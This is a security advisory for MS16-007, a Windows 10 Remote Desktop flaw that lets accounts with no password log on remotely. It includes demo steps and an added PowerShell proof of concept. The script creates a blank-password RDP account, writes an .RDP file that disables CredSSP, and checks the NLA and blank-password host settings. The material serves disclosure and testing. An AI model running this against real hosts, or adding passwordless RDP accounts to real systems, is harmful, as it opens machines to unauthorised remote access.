Timeline :
Vulnerability discovered and reported to the vendor by Gal Goldshtein and Viktor Minin of Citadel
Patched by the vendor through MS16-007 on 2016-01-12
Details of the vulnerability provided by Michael Schierl @mihi42 on 2016-01-12
PoC provided by :
Michael Schierl
Reference(s) :
Affected version(s) :
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 version 1511 for 32-bit Systems
Windows 10 version 1511 for x64-based Systems
Tested on :
Windows 10 for x64-based Systems with Microsoft Remote Desktop for Mac version 8.0.26
Description :
A security feature bypass vulnerability exists in Windows Remote Desktop Protocol (RDP) that is caused when Windows 10 hosts running RDP services fail to prevent remote logon to accounts that have no password set. The client-side setting "enablecredsspsupport:i:0" used in the demo disables CredSSP, that is Network Level Authentication (NLA), so the credentials are checked by the host's interactive logon path instead of being required before the session is established; a host that enforces NLA refuses such a client before any logon screen is shown.
Demo :
- On the target Windows 10:
  Create a local user without a password
  Grant the created user RDP access (for example by adding it to the "Remote Desktop Users" group)
- On the client:
  Add "enablecredsspsupport:i:0" to the ".RDP" file
  Connect to the target with the username and no password
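The demo steps above, collected into one PowerShell script. This is an added example, not code from the advisory or from the PoC author: the target-side part creates the blank-password account and grants it RDP access, the client-side part writes the ".RDP" file with CredSSP disabled, and a final section reads the two host settings a defender would check. The account name "rdptest", the host name "WIN10-TARGET" and the output path are assumptions for illustration, and the script assumes Remote Desktop is already enabled on the target.

```powershell
#Requires -RunAsAdministrator
# Added example for the MS16-007 demo; not part of the original advisory.
# Assumed names (not in the original): account "rdptest", target "WIN10-TARGET".

$User   = 'rdptest'
$Target = 'WIN10-TARGET'

# --- Target side: a local account with no password that may use RDP ---
# Run this section on the Windows 10 host under test.
if (-not (Get-LocalUser -Name $User -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $User -NoPassword -Description 'MS16-007 test account' | Out-Null
}
# Membership in "Remote Desktop Users" is what grants the account RDP logon.
Add-LocalGroupMember -Group 'Remote Desktop Users' -Member $User -ErrorAction SilentlyContinue

# --- Client side: an .RDP file with CredSSP turned off, as in the demo ---
# The file uses the plain "name:type:value" format read by mstsc.exe and the
# Microsoft Remote Desktop clients; copy it to the client machine and open it there.
$RdpFile = Join-Path $env:USERPROFILE "$Target-nocredssp.rdp"
@(
    "full address:s:$Target"
    "username:s:$User"
    'enablecredsspsupport:i:0'    # the setting from the demo: no CredSSP / NLA on the client
) | Set-Content -Path $RdpFile -Encoding ASCII

# --- Host-side checks ---
# UserAuthentication = 1 means the host accepts NLA connections only, so a client
# that disables CredSSP is refused before any logon screen appears.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$nla   = (Get-ItemProperty -Path $tsKey -Name UserAuthentication).UserAuthentication

# LimitBlankPasswordUse = 1 is the policy "Accounts: Limit local account use of blank
# passwords to console logon only", the control meant to block exactly this logon.
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$blank  = (Get-ItemProperty -Path $lsaKey -Name LimitBlankPasswordUse).LimitBlankPasswordUse

[pscustomobject]@{
    RdpFile                  = $RdpFile
    NlaRequired              = ($nla -eq 1)
    BlankPasswordConsoleOnly = ($blank -eq 1)
}
```

Run the target-side section only on a disposable test VM and remove the account afterwards with `Remove-LocalUser -Name rdptest`. The two reported flags are a workaround check, not the fix: on an unpatched host the blank-password policy is present but not honoured for this logon path, so the durable remedy is the MS16-007 update, with "NlaRequired" set to true as defence in depth because it rejects clients that disable CredSSP.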